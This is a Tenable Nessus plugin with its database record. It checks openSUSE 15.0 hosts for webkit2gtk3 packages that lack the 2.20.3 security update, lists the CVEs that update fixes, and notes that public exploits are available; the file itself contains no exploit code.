ID: OPENSUSE-2019-566.NASL
Type: nessus
Reporter: This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified: 2019-03-27T00:00:00
Description
This update for webkit2gtk3 to version 2.20.3 fixes the following issues:

These security issues were fixed:

- CVE-2018-4190: An unspecified issue allowed remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch (bsc#1097693).
- CVE-2018-4199: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted website (bsc#1097693).
- CVE-2018-4218: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers an @generatorState use-after-free (bsc#1097693).
- CVE-2018-4222: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation (bsc#1097693).
- CVE-2018-4232: An unspecified issue allowed remote attackers to overwrite cookies via a crafted website (bsc#1097693).
- CVE-2018-4233: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1097693).
- CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandle an unset pageURL, leading to an application crash (bsc#1095611).

These non-security issues were fixed:

- Disable Gigacage if mmap fails to allocate in Linux.
- Add user agent quirk for paypal website.
- Fix a network process crash when trying to get cookies of about:blank page.
- Fix UI process crash when closing the window under Wayland.
- Fix several crashes and rendering issues.

This update was imported from the SUSE:SLE-15:Update update project.
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update openSUSE-2019-566.
#
# The text description of this plugin is (C) SUSE LLC.
#
include("compat.inc");

if (description)
{
  script_id(123245);
  script_version("1.4");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/09/22");

  script_cve_id("CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233");

  script_name(english:"openSUSE Security Update : webkit2gtk3 (openSUSE-2019-566)");
  script_summary(english:"Check for the openSUSE-2019-566 patch");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote openSUSE host is missing a security update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"This update for webkit2gtk3 to version 2.20.3 fixes the following
issues :

These security issues were fixed :

  - CVE-2018-4190: An unspecified issue allowed remote
    attackers to obtain sensitive credential information
    that is transmitted during a CSS mask-image fetch
    (bsc#1097693).

  - CVE-2018-4199: An unspecified issue allowed remote
    attackers to execute arbitrary code or cause a denial of
    service (buffer overflow and application crash) via a
    crafted website (bsc#1097693)

  - CVE-2018-4218: An unspecified issue allowed remote
    attackers to execute arbitrary code or cause a denial of
    service (memory corruption and application crash) via a
    crafted website that triggers an @generatorState
    use-after-free (bsc#1097693)

  - CVE-2018-4222: An unspecified issue allowed remote
    attackers to execute arbitrary code via a crafted
    website that leverages a getWasmBufferFromValue
    out-of-bounds read during WebAssembly compilation
    (bsc#1097693)

  - CVE-2018-4232: An unspecified issue allowed remote
    attackers to overwrite cookies via a crafted website
    (bsc#1097693)

  - CVE-2018-4233: An unspecified issue allowed remote
    attackers to execute arbitrary code or cause a denial of
    service (memory corruption and application crash) via a
    crafted website (bsc#1097693)

  - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL
    and webkitFaviconDatabaseSetIconURLForPageURL mishandle
    an unset pageURL, leading to an application crash
    (bsc#1095611).

These non-security issues were fixed :

  - Disable Gigacage if mmap fails to allocate in Linux.

  - Add user agent quirk for paypal website.

  - Fix a network process crash when trying to get cookies
    of about:blank page.

  - Fix UI process crash when closing the window under
    Wayland.

  - Fix several crashes and rendering issues. This update
    was imported from the SUSE:SLE-15:Update update project."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1095611"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1097693"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected webkit2gtk3 packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Safari Proxy Object Type Confusion');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:webkit-jsc-4");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:webkit2gtk3-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:15.0");

  script_set_attribute(attribute:"vuln_publication_date", value:"2018/06/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2019/03/23");
  script_set_attribute(attribute:"plugin_publication_date", value:"2019/03/27");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
if (release !~ "^(SUSE15\.0)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "15.0", release);
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
ourarch = get_kb_item("Host/cpu");
if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
flag = 0;
if ( rpm_check(release:"SUSE15.0", reference:"libjavascriptcoregtk-4_0-18-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"libwebkit2gtk-4_0-37-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"libwebkit2gtk-4_0-37-debuginfo-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"libwebkit2gtk3-lang-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"typelib-1_0-JavaScriptCore-4_0-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"typelib-1_0-WebKit2-4_0-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"webkit-jsc-4-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"webkit-jsc-4-debuginfo-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"webkit2gtk-4_0-injected-bundles-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"webkit2gtk3-debugsource-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"webkit2gtk3-devel-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"webkit2gtk3-plugin-process-gtk2-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", reference:"webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", cpu:"x86_64", reference:"libjavascriptcoregtk-4_0-18-32bit-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", cpu:"x86_64", reference:"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", cpu:"x86_64", reference:"libwebkit2gtk-4_0-37-32bit-2.20.3-lp150.2.3.1") ) flag++;
if ( rpm_check(release:"SUSE15.0", cpu:"x86_64", reference:"libwebkit2gtk-4_0-37-32bit-debuginfo-2.20.3-lp150.2.3.1") ) flag++;

if (flag)
{
  if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
  else security_warning(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc");
}
{"id": "OPENSUSE-2019-566.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2019-566)", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering 
issues. This update\n was imported from the SUSE:SLE-15:Update update project.", "published": "2019-03-27T00:00:00", "modified": "2019-03-27T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/123245", "reporter": "This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1095611", "https://bugzilla.opensuse.org/show_bug.cgi?id=1097693"], "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "type": "nessus", "lastseen": "2020-09-23T16:46:40", "edition": 13, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2018-845.NASL", "ITUNES_12_7_5.NASL", "APPLETV_11_4.NASL", "SUSE_SU-2018-2075-1.NASL", "FEDORA_2018-118B9ABF99.NASL", "UBUNTU_USN-3687-1.NASL", "MACOSX_SAFARI11_1_1.NASL", "SUSE_SU-2018-3387-1.NASL", "FEDORA_2018-AAC3CA8936.NASL", "ITUNES_12_7_5_BANNER.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:3473-1", "OPENSUSE-SU-2018:2285-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310874687", "OPENVAS:1361412562310843564", "OPENVAS:1361412562310813509", "OPENVAS:1361412562310851975", "OPENVAS:1361412562310813513", "OPENVAS:1361412562310852089", "OPENVAS:1361412562310874747", "OPENVAS:1361412562310813514"]}, {"type": "fedora", "idList": ["FEDORA:A7C5B60D2E0C", "FEDORA:EC42160A1040"]}, {"type": "ubuntu", "idList": ["USN-3687-1"]}, {"type": "cve", "idList": ["CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4233", "CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4222", "CVE-2018-4232"]}, {"type": "seebug", "idList": ["SSV:97335", "SSV:97334"]}, {"type": "apple", "idList": ["APPLE:HT208852", "APPLE:HT208850", "APPLE:HT208853", "APPLE:HT208851", "APPLE:HT208854", "APPLE:HT208848"]}, {"type": "kaspersky", "idList": ["KLA11282"]}, {"type": "packetstorm", "idList": 
["PACKETSTORM:150779", "PACKETSTORM:153148", "PACKETSTORM:148135", "PACKETSTORM:148053"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:031DF743451446CD96638EB1AA5E6C47", "EXPLOITPACK:C7B5D1AF7C2C90DC97EDE10892A220CC"]}, {"type": "exploitdb", "idList": ["EDB-ID:44842", "EDB-ID:44861", "EDB-ID:44859", "EDB-ID:45998", "EDB-ID:44876"]}, {"type": "zdt", "idList": ["1337DAY-ID-30538", "1337DAY-ID-31793", "1337DAY-ID-30560", "1337DAY-ID-30559", "1337DAY-ID-32828", "1337DAY-ID-30569"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/OSX/BROWSER/SAFARI_PROXY_OBJECT_TYPE_CONFUSION/", "MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS/", "MSF:AUXILIARY/DOS/HTTP/WEBKITPLUS", "MSF:EXPLOIT/OSX/BROWSER/SAFARI_PROXY_OBJECT_TYPE_CONFUSION", "MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS"]}, {"type": "zdi", "idList": ["ZDI-18-781", "ZDI-18-1321"]}, {"type": "gentoo", "idList": ["GLSA-201808-04"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:9418CBB054BDA9E57D7F2E7ABF5F7BE0"]}], "modified": "2020-09-23T16:46:40", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2020-09-23T16:46:40", "rev": 2}, "vulnersScore": 8.1}, "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-566.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123245);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2019-566)\");\n script_summary(english:\"Check for the openSUSE-2019-566 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE 
host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues. 
This update\n was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk3-lang-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", 
reference:\"webkit-jsc-4-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-debugsource-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-devel-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "123245", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", 
